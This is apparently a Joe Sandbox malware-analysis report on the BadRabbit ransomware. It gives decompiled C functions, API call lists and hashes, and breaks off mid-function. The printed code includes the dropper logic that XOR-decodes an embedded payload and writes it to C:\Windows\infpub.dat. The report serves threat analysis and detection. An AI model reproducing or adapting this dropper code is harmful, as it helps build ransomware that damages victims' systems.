                                                                                                                                                              						_t77 = ( *(_t47 + _t76 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                              						_t88 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                              						if(_t88 > 0) {
                                                                                                                                                              							_t77 = _t77 + _t88 * 8;
                                                                                                                                                              						}
                                                                                                                                                              						_t49 =  *((intOrPtr*)(_t48 + 0x98));
                                                                                                                                                              						_push(_t89);
                                                                                                                                                              						_t91 =  *((intOrPtr*)(_t77 - 0x28 + 0x14)) +  *((intOrPtr*)(_t77 - 0x28 + 0x10));
                                                                                                                                                              						if(_t49 == 0) {
                                                                                                                                                              							_t49 = _v1580;
                                                                                                                                                              						}
                                                                                                                                                              						_push(_t66);
                                                                                                                                                              						_t67 = _t49 - _t91;
                                                                                                                                                              						_t52 = RtlAllocateHeap(GetProcessHeap(), 0, _t67); // executed
                                                                                                                                                              						_t97 = _t52;
                                                                                                                                                              						if(_t97 == 0) {
                                                                                                                                                              							_pop(_t68);
                                                                                                                                                              							_pop(_t92);
                                                                                                                                                              							return E01101499(_v1576, _t68, _v8 ^ _t98, _t88, _t92, _t97);
                                                                                                                                                              						} else {
                                                                                                                                                              							memcpy(_t97, _t91 + _v1572, _t67);
                                                                                                                                                              							if(_t67 != 0) {
                                                                                                                                                              								_t85 =  *_t97;
                                                                                                                                                              								_t65 = _t67;
                                                                                                                                                              								do {
                                                                                                                                                              									_t85 = _t85 ^ 0x000000e9;
                                                                                                                                                              									_t65 = _t65 - 1;
                                                                                                                                                              								} while (_t65 != 0);
                                                                                                                                                              								 *_t97 = _t85;
                                                                                                                                                              							}
                                                                                                                                                              							_t56 =  *_t97;
                                                                                                                                                              							_v1572 = _t56;
                                                                                                                                                              							_t58 = RtlAllocateHeap(GetProcessHeap(), 8, _t56); // executed
                                                                                                                                                              							 *_v1588 = _t58;
                                                                                                                                                              							if(_t58 == 0) {
                                                                                                                                                              								L14:
                                                                                                                                                              								_t69 = _v1576;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t28 = _t97 + 4; // 0x4
                                                                                                                                                              								_t88 = _t28;
                                                                                                                                                              								_t63 = E01101690(_t58,  &_v1572, _t28, _t67 + 0xfffffffc); // executed
                                                                                                                                                              								if(_t63 != 0) {
                                                                                                                                                              									goto L14;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t88 = _v1572;
                                                                                                                                                              									 *_v1584 = _v1572;
                                                                                                                                                              									_t69 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							HeapFree(GetProcessHeap(), 0, _t97);
                                                                                                                                                              							_pop(_t70);
                                                                                                                                                              							_pop(_t95);
                                                                                                                                                              							return E01101499(_t69, _t70, _v8 ^ _t98, _t88, _t95, _t97);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}


































                                                                                                                                                              0x011010c0
                                                                                                                                                              0x011010c0
                                                                                                                                                              0x011010d0
                                                                                                                                                              0x011010dc
                                                                                                                                                              0x011010e6
                                                                                                                                                              0x011010ec
                                                                                                                                                              0x011010f2
                                                                                                                                                              0x01101107
                                                                                                                                                              0x0110123e
                                                                                                                                                              0x0110124e
                                                                                                                                                              0x0110110d
                                                                                                                                                              0x01101121
                                                                                                                                                              0x01101128
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0110112e
                                                                                                                                                              0x0110112e
                                                                                                                                                              0x01101134
                                                                                                                                                              0x0110113c
                                                                                                                                                              0x0110113e
                                                                                                                                                              0x01101142
                                                                                                                                                              0x01101148
                                                                                                                                                              0x0110114d
                                                                                                                                                              0x0110114d
                                                                                                                                                              0x01101150
                                                                                                                                                              0x01101159
                                                                                                                                                              0x0110115d
                                                                                                                                                              0x01101162
                                                                                                                                                              0x01101164
                                                                                                                                                              0x01101164
                                                                                                                                                              0x0110116a
                                                                                                                                                              0x0110116d
                                                                                                                                                              0x01101179
                                                                                                                                                              0x0110117f
                                                                                                                                                              0x01101183
                                                                                                                                                              0x0110122b
                                                                                                                                                              0x0110122c
                                                                                                                                                              0x0110123b
                                                                                                                                                              0x01101189
                                                                                                                                                              0x01101192
                                                                                                                                                              0x0110119c
                                                                                                                                                              0x0110119e
                                                                                                                                                              0x011011a0
                                                                                                                                                              0x011011a2
                                                                                                                                                              0x011011a2
                                                                                                                                                              0x011011a5
                                                                                                                                                              0x011011a5
                                                                                                                                                              0x011011a8
                                                                                                                                                              0x011011a8
                                                                                                                                                              0x011011aa
                                                                                                                                                              0x011011b5
                                                                                                                                                              0x011011be
                                                                                                                                                              0x011011ca
                                                                                                                                                              0x011011ce
                                                                                                                                                              0x011011fe
                                                                                                                                                              0x011011fe
                                                                                                                                                              0x011011d0
                                                                                                                                                              0x011011d4
                                                                                                                                                              0x011011d4
                                                                                                                                                              0x011011e0
                                                                                                                                                              0x011011e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x011011e9
                                                                                                                                                              0x011011e9
                                                                                                                                                              0x011011f5
                                                                                                                                                              0x011011f7
                                                                                                                                                              0x011011f7
                                                                                                                                                              0x011011e7
                                                                                                                                                              0x0110120a
                                                                                                                                                              0x01101212
                                                                                                                                                              0x01101213
                                                                                                                                                              0x01101222
                                                                                                                                                              0x01101222
                                                                                                                                                              0x01101183
                                                                                                                                                              0x01101128

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 011010F8
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000), ref: 011010FF
                                                                                                                                                                • Part of subcall function 01101000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0110101A
                                                                                                                                                                • Part of subcall function 01101000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0110102D
                                                                                                                                                                • Part of subcall function 01101000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0110103D
                                                                                                                                                                • Part of subcall function 01101000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01101044
                                                                                                                                                                • Part of subcall function 01101000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01101060
                                                                                                                                                                • Part of subcall function 01101000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01101071
                                                                                                                                                                • Part of subcall function 01101000: HeapFree.KERNEL32(00000000,?,?), ref: 01101078
                                                                                                                                                                • Part of subcall function 01101000: CloseHandle.KERNEL32(00000000,?), ref: 01101080
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 01101172
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 01101179
                                                                                                                                                              • memcpy.MSVCRT ref: 01101192
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 011011BB
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 011011BE
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01101207
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0110120A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$File$Allocate$FreeHandleModule$CloseCreateNameReadSizememcpy
                                                                                                                                                              • String ID: Uet
                                                                                                                                                              • API String ID: 3076684055-2766386878
                                                                                                                                                              • Opcode ID: 9775063a10c82efd9d82e6a1f6c91a80c3e62c8d18e8d06212973af94ffe8270
                                                                                                                                                              • Instruction ID: 6ce2fb081f45036da7d3de8ad53354e0cb0b1a83e080dfca2c1e2f9d29151427
                                                                                                                                                              • Opcode Fuzzy Hash: 9775063a10c82efd9d82e6a1f6c91a80c3e62c8d18e8d06212973af94ffe8270
                                                                                                                                                              • Instruction Fuzzy Hash: 5041E771E00118ABDB29DF68DC84BEAB7B9FF98300F0041A9E905D7285DB75D954CFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E01101000(WCHAR* __eax, void** _a4, long* _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				DWORD* _v12;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				long _t18;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				long _t32;
                                                                                                                                                              
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_t11 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                              				_t24 = _t11;
                                                                                                                                                              				if(_t24 == 0xffffffff) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t32 = GetFileSize(_t24, 0);
                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                              						L8:
                                                                                                                                                              						FindCloseChangeNotification(_t24); // executed
                                                                                                                                                              						return _v12;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t17 = RtlAllocateHeap(GetProcessHeap(), 0, _t32); // executed
                                                                                                                                                              						_t28 = _t17;
                                                                                                                                                              						if(_t28 == 0) {
                                                                                                                                                              							L7:
                                                                                                                                                              							goto L8;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							_t18 = ReadFile(_t24, _t28, _t32,  &_v8, 0); // executed
                                                                                                                                                              							if(_t18 != 0 || _v8 != _t32) {
                                                                                                                                                              								 *_a4 = _t28;
                                                                                                                                                              								 *_a8 = _t32;
                                                                                                                                                              								_v12 = 1;
                                                                                                                                                              								goto L7;
                                                                                                                                                              							} else {
                                                                                                                                                              								HeapFree(GetProcessHeap(), _t18, _t28);
                                                                                                                                                              								CloseHandle(_t24);
                                                                                                                                                              								return _v12;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}











                                                                                                                                                              0x01101017
                                                                                                                                                              0x0110101a
                                                                                                                                                              0x01101020
                                                                                                                                                              0x01101025
                                                                                                                                                              0x011010bc
                                                                                                                                                              0x0110102b
                                                                                                                                                              0x01101033
                                                                                                                                                              0x01101037
                                                                                                                                                              0x011010a3
                                                                                                                                                              0x011010a4
                                                                                                                                                              0x011010b2
                                                                                                                                                              0x01101039
                                                                                                                                                              0x01101044
                                                                                                                                                              0x0110104a
                                                                                                                                                              0x0110104e
                                                                                                                                                              0x011010a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01101050
                                                                                                                                                              0x01101059
                                                                                                                                                              0x01101060
                                                                                                                                                              0x01101068
                                                                                                                                                              0x01101097
                                                                                                                                                              0x01101099
                                                                                                                                                              0x0110109b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0110106f
                                                                                                                                                              0x01101078
                                                                                                                                                              0x01101080
                                                                                                                                                              0x0110108e
                                                                                                                                                              0x0110108e
                                                                                                                                                              0x01101068
                                                                                                                                                              0x0110104e
                                                                                                                                                              0x01101037

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0110101A
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0110102D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0110103D
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01101044
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01101060
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01101071
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 01101078
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 01101080
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 011010A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$File$CloseProcess$AllocateChangeCreateFindFreeHandleNotificationReadSize
                                                                                                                                                              • String ID: Uet
                                                                                                                                                              • API String ID: 631125692-2766386878
                                                                                                                                                              • Opcode ID: b8a0dace753fdef4c61213d88ccbcd9fd79b66bf9777e61eb1a26f6cfedf9f1e
                                                                                                                                                              • Instruction ID: f3c4b812e6c02ca1bd081ab4fa87f99db8dc4bf8b0d94226a1ab6c339d22017c
                                                                                                                                                              • Opcode Fuzzy Hash: b8a0dace753fdef4c61213d88ccbcd9fd79b66bf9777e61eb1a26f6cfedf9f1e
                                                                                                                                                              • Instruction Fuzzy Hash: F6218472E01214BBD736DAA9AC8CFDBBF6CEB45762F104155FA58A2248D7B18580C7A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 72 1101260-1101282 CreateFileW 73 1101284-1101297 WriteFile 72->73 74 11012aa-11012af 72->74 75 11012a3-11012a4 FindCloseChangeNotification 73->75 76 1101299-110129c 73->76 75->74 76->75 77 110129e 76->77 77->75
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E01101260(long __ebx, long _a4) {
                                                                                                                                                              				void* _t4;
                                                                                                                                                              				int _t7;
                                                                                                                                                              				struct _OVERLAPPED* _t11;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              
                                                                                                                                                              				_t11 = 0;
                                                                                                                                                              				_t4 = CreateFileW(L"C:\\Windows\\infpub.dat", 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                              				_t12 = _t4;
                                                                                                                                                              				if(_t12 != 0xffffffff) {
                                                                                                                                                              					_t7 = WriteFile(_t12, _a4, __ebx,  &_a4, 0); // executed
                                                                                                                                                              					if(_t7 != 0 && _a4 == __ebx) {
                                                                                                                                                              						_t11 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					FindCloseChangeNotification(_t12); // executed
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              			}







                                                                                                                                                              0x01101265
                                                                                                                                                              0x01101277
                                                                                                                                                              0x0110127d
                                                                                                                                                              0x01101282
                                                                                                                                                              0x0110128f
                                                                                                                                                              0x01101297
                                                                                                                                                              0x0110129e
                                                                                                                                                              0x0110129e
                                                                                                                                                              0x011012a4
                                                                                                                                                              0x011012a4
                                                                                                                                                              0x011012af

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,011013F0,?,?,?), ref: 01101277
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,011013F0,?,?,?), ref: 0110128F
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,011013F0,?,?,?), ref: 011012A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                              • String ID: C:\Windows\infpub.dat
                                                                                                                                                              • API String ID: 3805958096-2284094909
                                                                                                                                                              • Opcode ID: 57ad1ae4ff76406cb45ac9b66c9c89885533a640517a1bba14cae7d1a3657c12
                                                                                                                                                              • Instruction ID: b21d0dab455fe58f64262180c4eaee8865856f6f09a1649c89e24222f88a7e95
                                                                                                                                                              • Opcode Fuzzy Hash: 57ad1ae4ff76406cb45ac9b66c9c89885533a640517a1bba14cae7d1a3657c12
                                                                                                                                                              • Instruction Fuzzy Hash: 37F082B6E011147BD7359A5AEC4CFDB3E6CEBC67A1F108139FB14D61C4D6A08881C2B0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 120 1103393-11033a5 malloc
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E01103393(signed int _a8, signed int _a12) {
                                                                                                                                                              				void* _t5;
                                                                                                                                                              
                                                                                                                                                              				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                              				return _t5;
                                                                                                                                                              			}




                                                                                                                                                              0x0110339e
                                                                                                                                                              0x011033a5

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                              • Opcode ID: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                                                                              • Instruction ID: 6ea1e54a143e84790a6d086774363571fc46d67414658a13a8314b826eef20b1
                                                                                                                                                              • Opcode Fuzzy Hash: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                                                                              • Instruction Fuzzy Hash: C2B0123344834E6B8F08EED9ED86C5A73DCEA64624F444407F91C8F580DAB5F5104658
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 624 1101499-110149f 625 11014a1 624->625 626 11014a4-110158a UnhandledExcep GetCurrentProcess TerminateProcess 624->626
                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                              			E01101499(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				void* _v804;
                                                                                                                                                              				intOrPtr _v808;
                                                                                                                                                              				intOrPtr _v812;
                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                              
                                                                                                                                                              				if(__ecx !=  *0x1108000) {
                                                                                                                                                              					 *0x1108120 = __eax;
                                                                                                                                                              					 *0x110811c = __ecx;
                                                                                                                                                              					 *0x1108118 = __edx;
                                                                                                                                                              					 *0x1108114 = __ebx;
                                                                                                                                                              					 *0x1108110 = __esi;
                                                                                                                                                              					 *0x110810c = __edi;
                                                                                                                                                              					 *0x1108138 = ss;
                                                                                                                                                              					 *0x110812c = cs;
                                                                                                                                                              					 *0x1108108 = ds;
                                                                                                                                                              					 *0x1108104 = es;
                                                                                                                                                              					 *0x1108100 = fs;
                                                                                                                                                              					 *0x11080fc = gs;
                                                                                                                                                              					asm("pushfd");
                                                                                                                                                              					_pop( *0x1108130);
                                                                                                                                                              					 *0x1108124 =  *_t25;
                                                                                                                                                              					 *0x1108128 = _v0;
                                                                                                                                                              					 *0x1108134 =  &_a4;
                                                                                                                                                              					 *0x1108070 = 0x10001;
                                                                                                                                                              					 *0x110802c =  *0x1108128;
                                                                                                                                                              					 *0x1108020 = 0xc0000409;
                                                                                                                                                              					 *0x1108024 = 1;
                                                                                                                                                              					_v812 =  *0x1108000;
                                                                                                                                                              					_v808 =  *0x1108004;
                                                                                                                                                              					SetUnhandledExceptionFilter(0);
                                                                                                                                                              					__imp__UnhandledExcep(0x1104080);
                                                                                                                                                              					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                              				} else {
                                                                                                                                                              					return __eax;
                                                                                                                                                              				}
                                                                                                                                                              			}








                                                                                                                                                              0x0110149f
                                                                                                                                                              0x011014b4
                                                                                                                                                              0x011014b9
                                                                                                                                                              0x011014bf
                                                                                                                                                              0x011014c5
                                                                                                                                                              0x011014cb
                                                                                                                                                              0x011014d1
                                                                                                                                                              0x011014d7
                                                                                                                                                              0x011014de
                                                                                                                                                              0x011014e5
                                                                                                                                                              0x011014ec
                                                                                                                                                              0x011014f3
                                                                                                                                                              0x011014fa
                                                                                                                                                              0x01101501
                                                                                                                                                              0x01101502
                                                                                                                                                              0x0110150b
                                                                                                                                                              0x01101513
                                                                                                                                                              0x0110151b
                                                                                                                                                              0x01101526
                                                                                                                                                              0x01101535
                                                                                                                                                              0x0110153a
                                                                                                                                                              0x01101544
                                                                                                                                                              0x01101553
                                                                                                                                                              0x0110155e
                                                                                                                                                              0x01101566
                                                                                                                                                              0x01101571
                                                                                                                                                              0x0110158a
                                                                                                                                                              0x011014a1
                                                                                                                                                              0x011014a1
                                                                                                                                                              0x011014a1

                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01101566
                                                                                                                                                              • UnhandledExcep.KERNEL32(01104080), ref: 01101571
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0110157C
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 01101583
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                                                                                                              • String ID: Pdet
                                                                                                                                                              • API String ID: 1999905405-3933575557
                                                                                                                                                              • Opcode ID: ad7a5373e3a879847c01b6f579c2477ee1761c590c3cb3086e7c330e4ed64df5
                                                                                                                                                              • Instruction ID: b110d47837081dfecb32d79e62b20cc0cda9e919e6e5e8f1b9860fa2b0f0e5e9
                                                                                                                                                              • Opcode Fuzzy Hash: ad7a5373e3a879847c01b6f579c2477ee1761c590c3cb3086e7c330e4ed64df5
                                                                                                                                                              • Instruction Fuzzy Hash: 4C21B8B9D09204DFC76BDF69F5846883BA4BF1C314B00803AE6289320CE7F499C28F59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 746 1101f3b-1101f4d 747 1101f7f-1101f90 746->747 748 1101f4f 746->748 750 1101f92 747->750 751 1101f9e-1101fba 747->751 749 1101f52-1101f57 748->749 752 1102a52-1102a7a 749->752 753 1101f5d-1101f7d 749->753 750->751 751->752 754 1101fc0-1101fcb 751->754 755 1102a91-1102aa5 call 1102dcb 752->755 756 1102a7c-1102a7f 752->756 753->747 753->749 757 1102012 754->757 758 1101fcd-1101fde 754->758 772 1102ab4 755->772 773 1102aa7-1102aaf 755->773 759 1102a81-1102a84 756->759 760 1102ab6-1102ace 756->760 762 1102a4f 757->762 761 1101fe4-110200a memcpy 758->761 758->762 759->760 764 1102a86-1102a89 759->764 765 1102ad0-1102ad2 760->765 766 1102af7-1102afa 760->766 761->757 762->752 764->755 770 1102a8b-1102a8f 764->770 765->766 771 1102ad4-1102ae1 765->771 768 1102b01 766->768 769 1102afc-1102aff 766->769 774 1102b06-1102b2f 768->774 769->768 769->774 770->755 770->760 775 1102ae3-1102ae8 call 11030c1 771->775 776 1102aea call 1102e91 771->776 772->760 778 1101dd3-1101dd9 773->778 780 1102b31-1102b33 774->780 781 1102b35-1102b39 774->781 783 1102aef-1102af4 775->783 776->783 780->781 784 1102b3b-1102b46 780->784 781->784 785 1102b4b-1102b4e 781->785 783->766 784->778 785->778
                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E01101F3B(signed int* __ebx, unsigned int __edx, signed int __edi, void* __esi) {
                                                                                                                                                              				signed int _t753;
                                                                                                                                                              				int _t763;
                                                                                                                                                              				int _t765;
                                                                                                                                                              				int _t770;
                                                                                                                                                              				int _t771;
                                                                                                                                                              				signed int _t774;
                                                                                                                                                              				int _t775;
                                                                                                                                                              				void* _t796;
                                                                                                                                                              				int _t797;
                                                                                                                                                              				int _t799;
                                                                                                                                                              				signed int* _t800;
                                                                                                                                                              				signed char _t803;
                                                                                                                                                              				signed int _t805;
                                                                                                                                                              				int _t806;
                                                                                                                                                              				void* _t811;
                                                                                                                                                              				signed int _t822;
                                                                                                                                                              				int _t824;
                                                                                                                                                              				signed int _t833;
                                                                                                                                                              				intOrPtr _t834;
                                                                                                                                                              				int _t835;
                                                                                                                                                              				void* _t837;
                                                                                                                                                              				intOrPtr* _t838;
                                                                                                                                                              				void* _t841;
                                                                                                                                                              				void* _t843;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					_t837 = __esi;
                                                                                                                                                              					_t800 = __ebx;
                                                                                                                                                              					_t803 = __edi & 0x00000007;
                                                                                                                                                              					_t833 = __edi - _t803;
                                                                                                                                                              					_t822 = __edx >> _t803;
                                                                                                                                                              					 *(_t841 - 0xc) = _t822;
                                                                                                                                                              					 *(_t841 - 0x10) = _t833;
                                                                                                                                                              					if(_t833 >= 0x20) {
                                                                                                                                                              						goto L168;
                                                                                                                                                              					}
                                                                                                                                                              					L165:
                                                                                                                                                              					__eax =  *(__ebp - 8);
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L166:
                                                                                                                                                              						__ecx =  *(__ebp - 4);
                                                                                                                                                              						if(__ecx == 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						L167:
                                                                                                                                                              						__eax =  *__eax & 0x000000ff;
                                                                                                                                                              						 *(__ebp - 4) = __ecx;
                                                                                                                                                              						__ecx = __edi;
                                                                                                                                                              						__eax = __eax << __cl;
                                                                                                                                                              						__edi = __edi + 8;
                                                                                                                                                              						__edx = __eax + __edx;
                                                                                                                                                              						 *(__ebp - 0x10) = __edi;
                                                                                                                                                              						__eax =  *(__ebp - 8);
                                                                                                                                                              						__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              						 *(__ebp - 0xc) = __edx;
                                                                                                                                                              						 *(__ebp - 8) = __eax;
                                                                                                                                                              						if(__edi < 0x20) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						goto L168;
                                                                                                                                                              					}
                                                                                                                                                              					L323:
                                                                                                                                                              					_t712 = _t841 + 8; // 0x38
                                                                                                                                                              					_t838 =  *_t712;
                                                                                                                                                              					 *(_t838 + 0xc) =  *(_t841 - 0x1c);
                                                                                                                                                              					_t716 = _t841 - 8; // 0x38
                                                                                                                                                              					 *((intOrPtr*)(_t838 + 0x10)) =  *((intOrPtr*)(_t841 - 0x18));
                                                                                                                                                              					_t824 = 0;
                                                                                                                                                              					 *_t838 =  *_t716;
                                                                                                                                                              					 *(_t838 + 4) = _t806;
                                                                                                                                                              					_t800[0xf] = _t833;
